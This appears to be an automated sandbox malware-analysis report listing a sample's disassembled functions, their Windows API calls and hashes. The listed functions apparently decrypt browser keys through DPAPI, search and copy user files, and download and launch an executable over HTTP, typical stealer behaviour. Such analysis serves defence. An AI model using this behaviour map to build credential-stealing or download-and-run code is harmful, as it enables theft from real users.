                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                                                                                                                                                        • String ID: $"encrypted_key":"$DPAPI
                                                                                                                                                                        • API String ID: 2311102621-738592651
                                                                                                                                                                        • Opcode ID: 11fdf69e68a19022bf36fd621960a723dc9ced40297b682c8e7376be946323c2
                                                                                                                                                                        • Instruction ID: a9192db77dc4dbee27c133c53a4031635f52cd9ff1ef6208b03d680a6c2e7a72
                                                                                                                                                                        • Opcode Fuzzy Hash: 11fdf69e68a19022bf36fd621960a723dc9ced40297b682c8e7376be946323c2
                                                                                                                                                                        • Instruction Fuzzy Hash: C1219F32A4060AABDF10FAA4DC41ADDB779EF91360F604665F911A7181DF30AB49CF60
                                                                                                                                                                        Function 001966A1 Relevance: 6.1, APIs: 4, Instructions: 73stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00191D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00191DD2
                                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 001966E9
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B6B54), ref: 00196706
                                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00196719
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B6B58), ref: 0019672B
                                                                                                                                                                          • Part of subcall function 00196013: wsprintfA.USER32 ref: 0019605A
                                                                                                                                                                          • Part of subcall function 00196013: FindFirstFileA.KERNEL32(?,?), ref: 00196071
                                                                                                                                                                          • Part of subcall function 00196013: StrCmpCA.SHLWAPI(?,001B6ABC), ref: 00196092
                                                                                                                                                                          • Part of subcall function 00196013: StrCmpCA.SHLWAPI(?,001B6AC0), ref: 001960AC
                                                                                                                                                                          • Part of subcall function 00196013: wsprintfA.USER32 ref: 001960D3
                                                                                                                                                                          • Part of subcall function 00196013: StrCmpCA.SHLWAPI(?,001B6647), ref: 001960E7
                                                                                                                                                                          • Part of subcall function 00196013: wsprintfA.USER32 ref: 00196104
                                                                                                                                                                          • Part of subcall function 00196013: PathMatchSpecA.SHLWAPI(?,?), ref: 00196131
                                                                                                                                                                          • Part of subcall function 00196013: lstrcatA.KERNEL32(?), ref: 00196167
                                                                                                                                                                          • Part of subcall function 00196013: lstrcatA.KERNEL32(?,001B6AD8), ref: 00196179
                                                                                                                                                                          • Part of subcall function 00196013: lstrcatA.KERNEL32(?,?), ref: 0019618C
                                                                                                                                                                          • Part of subcall function 00196013: lstrcatA.KERNEL32(?,001B6ADC), ref: 0019619E
                                                                                                                                                                          • Part of subcall function 00196013: lstrcatA.KERNEL32(?,?), ref: 001961B2
                                                                                                                                                                          • Part of subcall function 00196013: wsprintfA.USER32 ref: 0019611B
                                                                                                                                                                          • Part of subcall function 00196013: CopyFileA.KERNEL32(?,?,00000001), ref: 0019626B
                                                                                                                                                                          • Part of subcall function 00196013: DeleteFileA.KERNEL32(?), ref: 001962DF
                                                                                                                                                                          • Part of subcall function 00196013: FindNextFileA.KERNEL32(?,?), ref: 00196341
                                                                                                                                                                          • Part of subcall function 00196013: FindClose.KERNEL32(?), ref: 00196355
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2104210347-0
                                                                                                                                                                        • Opcode ID: 0c737c7dacc4e227e2e7143718d4d7edb22cd58d223d10cd6418af6187f27b20
                                                                                                                                                                        • Instruction ID: 138f541b1ccfad49d428b2c883a45835644c2ff4ef953844a40ea8566686d5d0
                                                                                                                                                                        • Opcode Fuzzy Hash: 0c737c7dacc4e227e2e7143718d4d7edb22cd58d223d10cd6418af6187f27b20
                                                                                                                                                                        • Instruction Fuzzy Hash: AA21607690011CABCF51EF64EC86AD97BBDEB24300F4040A2F585A7250EFB49AD58F51
                                                                                                                                                                        Function 00190C95 Relevance: 6.0, APIs: 4, Instructions: 39memorytimeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,001B65B6,?,?,?), ref: 00190CAD
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00190CB4
                                                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 00190CC0
                                                                                                                                                                        • wsprintfA.USER32 ref: 00190CEB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1243822799-0
                                                                                                                                                                        • Opcode ID: 7e833ab2ba643ff3adaa94f11ebf4cf653c5077d94dfd1bddaa6367957943a1a
                                                                                                                                                                        • Instruction ID: e36f49dc3ecb37f3ddd9f5e737f7956e8e127a6cf110cbb91bf5fe2fa936b750
                                                                                                                                                                        • Opcode Fuzzy Hash: 7e833ab2ba643ff3adaa94f11ebf4cf653c5077d94dfd1bddaa6367957943a1a
                                                                                                                                                                        • Instruction Fuzzy Hash: 39F0E1B6901118BBDB51ABE5ED05ABF7BFCAB0CB11F400156F941E6190D6389A80D771
                                                                                                                                                                        Function 0019213B Relevance: 6.0, APIs: 4, Instructions: 34fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileA.KERNEL32(00194FEC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00194FEC,?), ref: 00192156
                                                                                                                                                                        • GetFileSizeEx.KERNEL32(00000000,00194FEC,?,?,?,00194FEC,?), ref: 0019216E
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00194FEC,?), ref: 00192179
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00194FEC,?), ref: 00192181
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseFileHandle$CreateSize
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4148174661-0
                                                                                                                                                                        • Opcode ID: d80622b52417b7e6f8a0a5e4c48b0eb4ed2c5bcc83b16a2521566694c181d71c
                                                                                                                                                                        • Instruction ID: c7508f3826b3587acf9fc0802637c997537810415a10cc80e5603f7bfacfe289
                                                                                                                                                                        • Opcode Fuzzy Hash: d80622b52417b7e6f8a0a5e4c48b0eb4ed2c5bcc83b16a2521566694c181d71c
                                                                                                                                                                        • Instruction Fuzzy Hash: 56F0A731A02215BBFB25BBA0EC49FDE3F6CDB04760F104221FA01EA1D0D7B06A508A91
                                                                                                                                                                        Function 00192C30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124processCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00185237: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0018527E
                                                                                                                                                                          • Part of subcall function 00185237: RtlAllocateHeap.NTDLL(00000000), ref: 00185285
                                                                                                                                                                          • Part of subcall function 00185237: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 001852A7
                                                                                                                                                                          • Part of subcall function 00185237: StrCmpCA.SHLWAPI(?), ref: 001852C1
                                                                                                                                                                          • Part of subcall function 00185237: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001852F1
                                                                                                                                                                          • Part of subcall function 00185237: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00185330
                                                                                                                                                                          • Part of subcall function 00185237: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00185360
                                                                                                                                                                          • Part of subcall function 00185237: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0018536B
                                                                                                                                                                          • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                          • Part of subcall function 0019241B: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00194ACD), ref: 00192435
                                                                                                                                                                        • _memset.LIBCMT ref: 00192D1F
                                                                                                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,001B6718), ref: 00192D71
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcat$AllocateConnectFileOptionSendSystemTime_memsetlstrlen
                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                        • API String ID: 2831197775-4119554291
                                                                                                                                                                        • Opcode ID: 8654fd85a1821cd296857c7895db7511e649427d857e117f175721ec516bd551
                                                                                                                                                                        • Instruction ID: 97bb0ee46eabe83f70a65fe2278195f17dd3579c02ff7b3ef2c55a040b8ee27b
                                                                                                                                                                        • Opcode Fuzzy Hash: 8654fd85a1821cd296857c7895db7511e649427d857e117f175721ec516bd551
                                                                                                                                                                        • Instruction Fuzzy Hash: B3413B36E00118AFDF12FBA4EC42ACE77B8AF65344F124161FA14B7152DB706E4A8B91
                                                                                                                                                                        Function 0018F068 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Xinvalid_argument_memmovestd::_
                                                                                                                                                                        • String ID: string too long
                                                                                                                                                                        • API String ID: 256744135-2556327735
                                                                                                                                                                        • Opcode ID: 10dc55e90e8b36ade3fe2521829d6b5acd15a1c43e4ebebdfe0172049f4aeceb
                                                                                                                                                                        • Instruction ID: 3ed4305fde4fb1f684bb0a1807440dbc16ec13b059b32b96e2788b93f44abb5d
                                                                                                                                                                        • Opcode Fuzzy Hash: 10dc55e90e8b36ade3fe2521829d6b5acd15a1c43e4ebebdfe0172049f4aeceb
                                                                                                                                                                        • Instruction Fuzzy Hash: 73117075300205AF9B18BE2DD840A79B7ABEF95324B24013DF8118B287D771EE52CBA1
                                                                                                                                                                        Function 00191EA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
